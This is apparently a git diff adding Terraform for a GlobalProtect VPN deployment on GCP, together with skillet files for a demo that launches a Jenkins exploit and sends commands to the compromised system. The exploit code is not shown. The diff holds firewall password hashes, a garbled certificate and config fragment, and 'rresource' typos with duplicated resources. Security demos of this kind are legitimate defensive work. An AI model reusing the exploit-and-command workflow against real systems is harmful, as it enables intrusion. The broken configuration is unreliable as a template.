CERTIFICATE----- + + RSA + -AQ==B+uxEDleVDIXpf2wVEueVGEMvc4=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 + + + + + + tls1-0 + max + + dummy-portal-cert + + + + + + + + + all + + + + + + + $1$kobgpbqd$tCeUrtyaJNKirLxMwLs/o1 + + + $1$xgwfehpw$rdQRIHTfNVtUZIdeunXHG1 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + traffic + All Logs + yes + + + threat + All Logs + yes + + + wildfire + All Logs + yes + + + url + All Logs + yes + + + data + All Logs + yes + + + tunnel + All Logs + yes + + + auth + All Logs + yes + + + + + + +
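The bootstrap-portal.tf file above builds the standard PAN-OS bootstrap package layout in the portal bucket: config/ holds bootstrap.xml and init-cfg.txt, while content/, software/ and license/ are created as empty folders (via null.txt placeholders) because the VM-Series bootstrap process expects all four directories to exist. As a minimal sketch only, not part of this change and assuming Terraform 0.12.6 or later (for resource for_each), the three placeholder objects could be generated from a single resource; the resource name portal_placeholders is illustrative:

resource "google_storage_bucket_object" "portal_placeholders" {
  # One empty placeholder object per bootstrap folder the firewall expects.
  # bootstrap-portal/null.txt is the empty file already present in this repository.
  for_each = toset(["content", "software", "license"])

  name   = "${each.key}/null.txt"
  source = "bootstrap-portal/null.txt"
  bucket = google_storage_bucket.portal_bucket.name
}

Either form produces the same bucket layout; the per-folder resources kept in this change are simply more explicit.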
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt new file mode 100644 index 00000000..3606b11c --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt @@ -0,0 +1,14 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt @@ -0,0 +1 @@ + diff --git a/gcp/GP-NoAutoScaling/gateways.tf b/gcp/GP-NoAutoScaling/gateways.tf new file mode 100644 index 00000000..eb72ede5 --- /dev/null +++ b/gcp/GP-NoAutoScaling/gateways.tf @@ -0,0 +1,121 @@ +resource "google_compute_address" "gp_gateway1_management" { + name = "gp-gateway1-management" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_address" "gp_gateway1_untrust" { + name = "gp-gateway1-untrust" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_instance" "gateway1" { + project = google_project.globalprotect.number + name = "gp-gateway1" + machine_type = var.FW_Machine_Type + zone = data.google_compute_zones.available.names[0] + can_ip_forward = true + allow_stopping_for_update = true + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = google_compute_subnetwork.untrust_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway1_untrust.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway1_management.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + } + + boot_disk { + initialize_params { + image = "${var.FW_Image}-${var.FW_PanOS}" + type = "pd-ssd" + } + } +} + +resource "google_compute_address" "gp_gateway2_management" { + name = "gp-gateway2-management" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_address" "gp_gateway2_untrust" { + name = "gp-gateway2-untrust" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_instance" "gateway2" { + project = google_project.globalprotect.number + name = "gp-gateway2" + machine_type = var.FW_Machine_Type + zone = data.google_compute_zones.available.names[1] + can_ip_forward = true + allow_stopping_for_update = true + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? 
"admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = google_compute_subnetwork.untrust_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway2_untrust.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway2_management.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + } + + boot_disk { + initialize_params { + image = "${var.FW_Image}-${var.FW_PanOS}" + type = "pd-ssd" + } + } +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/gcp_firewall.tf b/gcp/GP-NoAutoScaling/gcp_firewall.tf new file mode 100644 index 00000000..afa4bc13 --- /dev/null +++ b/gcp/GP-NoAutoScaling/gcp_firewall.tf @@ -0,0 +1,33 @@ +resource "google_compute_firewall" "management" { + name = "management-firewall" + project = google_project.globalprotect.number + network = google_compute_network.management_network.name + allow { + protocol = "tcp" + ports = ["22", "443"] + } +} +resource "google_compute_firewall" "untrust" { + name = "untrust-firewall" + project = google_project.globalprotect.number + network = google_compute_network.untrust_network.name + allow { + protocol = "tcp" + ports = ["443"] + } + allow { + protocol = "udp" + ports = ["500","4500","4501"] + } + allow { + protocol = "esp" + } +} +resource "google_compute_firewall" "trust" { + name = "trust-firewall" + project = google_project.globalprotect.number + network = google_compute_network.trust_network.name + allow { + protocol = "all" + } +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/images/GP_in_GCP.png b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png new file mode 100644 index 00000000..989ebab3 Binary files /dev/null and b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png differ diff --git a/gcp/GP-NoAutoScaling/main.tf b/gcp/GP-NoAutoScaling/main.tf new file mode 100644 index 00000000..c6940ef9 --- /dev/null +++ b/gcp/GP-NoAutoScaling/main.tf @@ -0,0 +1,3 @@ +provider "google" {} + +provider "random" {} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/output.tf b/gcp/GP-NoAutoScaling/output.tf new file mode 100644 index 00000000..754d45d4 --- /dev/null +++ b/gcp/GP-NoAutoScaling/output.tf @@ -0,0 +1,11 @@ +output "Portal-Management-IP" { + value = "${google_compute_instance.portal.network_interface.1.access_config.0.nat_ip}" +} + +output "Gateway1-Management-IP" { + value = "${google_compute_instance.gateway1.network_interface.1.access_config.0.nat_ip}" +} + +output "Gateway2-Management-IP" { + value = "${google_compute_instance.gateway2.network_interface.1.access_config.0.nat_ip}" +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/portal.tf b/gcp/GP-NoAutoScaling/portal.tf new file mode 100644 index 00000000..dfed3411 --- /dev/null +++ b/gcp/GP-NoAutoScaling/portal.tf @@ -0,0 +1,56 @@ +resource "google_compute_address" "gp_portal_management" { + name = "gp-portal-management" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_address" "gp_portal_untrust" { + name = "gp-portal-untrust" + project = 
google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_instance" "portal" { + project = google_project.globalprotect.number + name = "gp-portal" + machine_type = var.FW_Machine_Type + zone = data.google_compute_zones.available.names[0] + can_ip_forward = false + allow_stopping_for_update = true + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = google_compute_subnetwork.untrust_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_portal_untrust.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_portal_management.address + } + } + + boot_disk { + initialize_params { + image = "${var.FW_Image}-${var.FW_PanOS}" + type = "pd-ssd" + } + } +} diff --git a/gcp/GP-NoAutoScaling/project.tf b/gcp/GP-NoAutoScaling/project.tf new file mode 100644 index 00000000..e44a7ff4 --- /dev/null +++ b/gcp/GP-NoAutoScaling/project.tf @@ -0,0 +1,19 @@ +resource "random_id" "random_number" { + byte_length = 2 +} +resource "google_project" "globalprotect" { + name = "${var.Base_Project_Name}-${random_id.random_number.hex}" + project_id = "${var.Base_Project_Name}-${random_id.random_number.hex}" + billing_account = var.Billing_Account + auto_create_network = false +} +resource "google_project_service" "globalprotect" { + project = google_project.globalprotect.number + service = "storage-api.googleapis.com" + disable_dependent_services = true +} + +data "google_compute_zones" "available" { + project = google_project.globalprotect.project_id + region = var.GCP_Region +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/servers.tf b/gcp/GP-NoAutoScaling/servers.tf new file mode 100644 index 00000000..f503ff40 --- /dev/null +++ b/gcp/GP-NoAutoScaling/servers.tf @@ -0,0 +1,77 @@ +resource "google_compute_instance" "server1" { + name = "server1" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[0] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? 
"admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config {} + } +} + +rresource "google_compute_instance" "server2" { + name = "server2" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[1] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config {} + } +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/terraform.tfvars b/gcp/GP-NoAutoScaling/terraform.tfvars new file mode 100644 index 00000000..780ca566 --- /dev/null +++ b/gcp/GP-NoAutoScaling/terraform.tfvars @@ -0,0 +1,22 @@ +Billing_Account = "" + +Base_Project_Name = "" + +Public_Key_Path = "~/.ssh/id_rsa.pub" + +GCP_Region = "" + +#FW_PanOS = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL +FW_PanOS = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1 +#FW_PanOS = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2 + +FW_Image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" + + +Management_Subnet_CIDR = "10.0.0.0/24" + +Untrust_Subnet_CIDR = "10.0.1.0/24" + +Trust_Subnet_CIDR = "10.0.2.0/24" + +FW_Machine_Type = "n1-standard-4" \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/variables.tf b/gcp/GP-NoAutoScaling/variables.tf new file mode 100644 index 00000000..fb7a8311 --- /dev/null +++ b/gcp/GP-NoAutoScaling/variables.tf @@ -0,0 +1,10 @@ +variable Billing_Account {} +variable Base_Project_Name {} +variable Public_Key_Path {} +variable GCP_Region {} +variable Management_Subnet_CIDR {} +variable Untrust_Subnet_CIDR {} +variable Trust_Subnet_CIDR {} +variable FW_Machine_Type {} +variable FW_PanOS {} +variable FW_Image {} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/vpc-subnets.tf b/gcp/GP-NoAutoScaling/vpc-subnets.tf new file mode 100644 index 00000000..5373f55c --- /dev/null +++ b/gcp/GP-NoAutoScaling/vpc-subnets.tf @@ -0,0 +1,36 @@ +resource "google_compute_network" "management_network" { + project = google_project.globalprotect.number + name = "management" + auto_create_subnetworks = false +} +resource "google_compute_network" "untrust_network" { + project = google_project.globalprotect.number + name = "untrust" + auto_create_subnetworks = false +} +resource 
"google_compute_network" "trust_network" { + project = google_project.globalprotect.number + name = "trust" + auto_create_subnetworks = false +} +resource "google_compute_subnetwork" "management_subnet" { + name = "management" + project = google_project.globalprotect.number + region = var.GCP_Region + ip_cidr_range = var.Management_Subnet_CIDR + network = google_compute_network.management_network.self_link +} +resource "google_compute_subnetwork" "untrust_subnet" { + name = "untrust" + project = google_project.globalprotect.number + region = var.GCP_Region + ip_cidr_range = var.Untrust_Subnet_CIDR + network = google_compute_network.untrust_network.self_link +} +resource "google_compute_subnetwork" "trust_subnet" { + name = "trust" + project = google_project.globalprotect.number + region = var.GCP_Region + ip_cidr_range = var.Trust_Subnet_CIDR + network = google_compute_network.trust_network.self_link +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/webservers.tf b/gcp/GP-NoAutoScaling/webservers.tf new file mode 100644 index 00000000..cbf1c424 --- /dev/null +++ b/gcp/GP-NoAutoScaling/webservers.tf @@ -0,0 +1,75 @@ +resource "google_compute_instance" "server1" { + name = "server1" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[0] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1804-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + access_config {} + } +} + +rresource "google_compute_instance" "server2" { + name = "server2" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[1] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? 
"admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1804-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + access_config {} + } +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml new file mode 100644 index 00000000..ae3c0a1b --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml @@ -0,0 +1,88 @@ +name: gcp_jenkins_exp +# label used for menu selection +label: GCP Jenkins Security Framework Step 1 Infrastructure Deployment Build + +description: > + This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment. The template deploy the Following: + GCP Projects, VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups. + The Template will also deploy Palo Alto Networks Firewall with security posture. +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. 
Each variable will be rendered as a form field in the panhandler application +variables: + - name: username + description: FW Username + default: admin + type_hint: text + - name: password + description: FW Password + default: + type_hint: password + - name: GCP_Region + description: GCP Region + default: us-central1 + type_hint: dropdown + dd_list: + - key: "US-Central-1 (Iowa)" + value: "us-central1" + - key: "US-East-1 (South Carolina)" + value: "us-east1" + - key: "US-East-4 (Virginia)" + value: "us-east4" + - key: "US-West-1 (Oregon)" + value: "us-west1" + - key: "US-West-2 (California)" + value: "us-west2" + - key: "Europe-North-1 (Finland)" + value: "europe-north1" + - key: "Europe-West-1 (Belgium)" + value: "europe-west1" + - key: "Europe-West-2 (UK)" + value: "europe-west2" + - key: "Europe-West-3 (Germany)" + value: "europe-west3" + - key: "Europe-West-4 (Netherlands)" + value: "europe-west4" + - key: "Europe-West-6 (Switzerland)" + value: "europe-west6" + - key: "North-America-Northeast-1 (Canada)" + value: "northamerica-northeast1" + - key: "South-America-East-1 (Brazil)" + value: "southamerica-east1" + - key: "Asia-East-1 (Taiwan)" + value: "asia-east1" + - key: "Asia-East-2 (Hong Kong)" + value: "asia-east2" + - key: "Asia-Northeast-1 (Tokyo)" + value: "asia-northeast1" + - key: "Asia-Northeast-2 (Osaka)" + value: "asia-northeast2" + - key: "Asia-South-1 (India)" + value: "asia-south1" + - key: "Asia-Southeast-1 (Singapore)" + value: "asia-southeast1" + - key: "Australia-Southeast-1 (Australia)" + value: "australia-southeast1" + - name: Billing_Account + description: GCP Billing Account + default: + type_hint: text + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: script + file: ../../deploy.py diff --git a/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml new file mode 100644 index 00000000..dcd0ad24 --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml @@ -0,0 +1,41 @@ +name: gcp_jenkins_exp_teardown +# label used for menu selection +label: GCP Jenkins Security Framework Step 4 Teardown + +description: > + This skillet will destroy the GCP Jenkins Environment. Run this step once the demo is complete. +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. 
Each variable will be rendered as a form field in the panhandler application +variables: + - name: username + description: FW Username + default: admin + type_hint: text + - name: password + description: FW Password + default: + type_hint: password + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: script + file: ../../destroy.py +# output_type: +# outputs: +# - name: app_threat_version +# capture_pattern: result/content-updates/entry/version diff --git a/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml new file mode 100644 index 00000000..539c9b30 --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml @@ -0,0 +1,41 @@ +name: gcp_jenkins_launch +# label used for menu selection +label: GCP Jenkins Security Framework Step 2 Launch exploit + +description: > + This skillet will launch the Jenkins exploit. You can choose to use the native tools or select PAN-OS enabled + security to run the exploit against the Jenkins web application. + +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: + - name: vector + description: Attack Vector + default: native + type_hint: dropdown + dd_list: + - key: Native WAF + value: native + - key: PAN-OS + value: panos + + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: payload + file: ../../launch_attack_vector.py \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml new file mode 100644 index 00000000..9f46a8bb --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml @@ -0,0 +1,32 @@ +name: GCP_login +label: GCP Login (Pre-Deployment Step) + +description: | + This skillet will log into GCP. You will be prompted to follow a link and enter a device-code in your browser. +# type of skillet (panos or panorama or template or terraform) +type: template + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. 
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+# - name: api_key
+#   description: API Key
+#   default: abc123
+#   type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+  - name: script
+    file: docker_cmd.j2
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
new file mode 100644
index 00000000..02637f31
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
@@ -0,0 +1,25 @@
+To authenticate to GCP, run one of the following commands:
+
+Make sure you have a .config directory in your home directory.
+On either macOS or Windows, if the .config directory does not exist in your home directory, create it:
+
+Run this command from a terminal or PowerShell session in your home directory:
+mkdir .config
+
+
+macOS - from a Terminal window:
+docker run -ti --rm -v $HOME/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+Windows - from a PowerShell window:
+docker run -ti -p 8888:80 --rm -v /c/Users/%USERNAME%/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+The command will display a link that you should copy into your browser. The page will then display a verification
+code that you use to authenticate this machine.
+
+
+For more information, see the Google Cloud SDK guide here:
+
+https://cloud.google.com/sdk/gcloud/
+
+And for more information on authenticating, see here:
+https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
new file mode 100644
index 00000000..5c843d7e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
@@ -0,0 +1,45 @@
+name: gcp_jenkins_send
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 3 Send Command
+
+description: >
+  This skillet allows you to interact with and send commands to the exploited Jenkins system.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
